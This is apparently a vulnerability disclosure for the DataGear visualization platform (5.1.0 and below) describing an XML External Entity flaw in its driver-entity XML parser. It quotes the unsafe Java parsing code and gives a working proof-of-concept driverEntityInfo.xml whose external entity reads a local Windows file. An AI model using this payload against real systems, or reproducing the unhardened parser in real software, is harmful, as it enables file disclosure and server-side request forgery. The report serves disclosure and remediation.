Description

DataGear is an open-source and free data visualization analysis platform that allows you to freely create any kind of data dashboard you want, supporting access to multiple data sources such as SQL, CSV, Excel, HTTP interface, JSON, etc.

DataGear 5.1.0 and below has a XXE vulnerability, which can exploit this vulnerability disclosing local files in the file system or perform a Server-Side Request Forgery (SSRF).

Unsafe Code

The org/datagear/connection/XmlDriverEntityManager.java#readDriverEntities function parses xml directly without disable DTD (Document Type Definition), and the xml is controllable, leading to XML External Entity.

@Override
protected List<DriverEntity> readDriverEntities(Reader in) throws DriverEntityManagerException
{
    List<DriverEntity> driverEntities = new ArrayList<DriverEntity>();

    DocumentBuilderFactory documentBuilderFactory;
    DocumentBuilder documentBuilder;
    Document document;

    try
    {
       documentBuilderFactory = DocumentBuilderFactory.newInstance();
       documentBuilder = documentBuilderFactory.newDocumentBuilder();
       document = documentBuilder.parse(new InputSource(in));

Steps to Reproduce

Upload a zip file containing the driverEntityInfo.xml file, with the content of driverEntityInfo.xml as follows:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE driver-entities [
<!ENTITY edward SYSTEM "file:///C:/windows/win.ini">
]>
<driver-entities>
    <driver-entity>
        <id>&edward;</id>
        <driver-class-name>com.mysql.jdbc.Driver</driver-class-name>
    </driver-entity>
    <driver-entity>
        <id>mysql-jre8</id>
        <driver-class-name>com.mysql.cj.jdbc.Driver</driver-class-name>
    </driver-entity>
    <driver-entity>
        <id>oracle</id>
        <driver-class-name>oracle.jdbc.OracleDriver</driver-class-name>
    </driver-entity>
</driver-entities>

After sending the request, you can see the returned value after XML parsing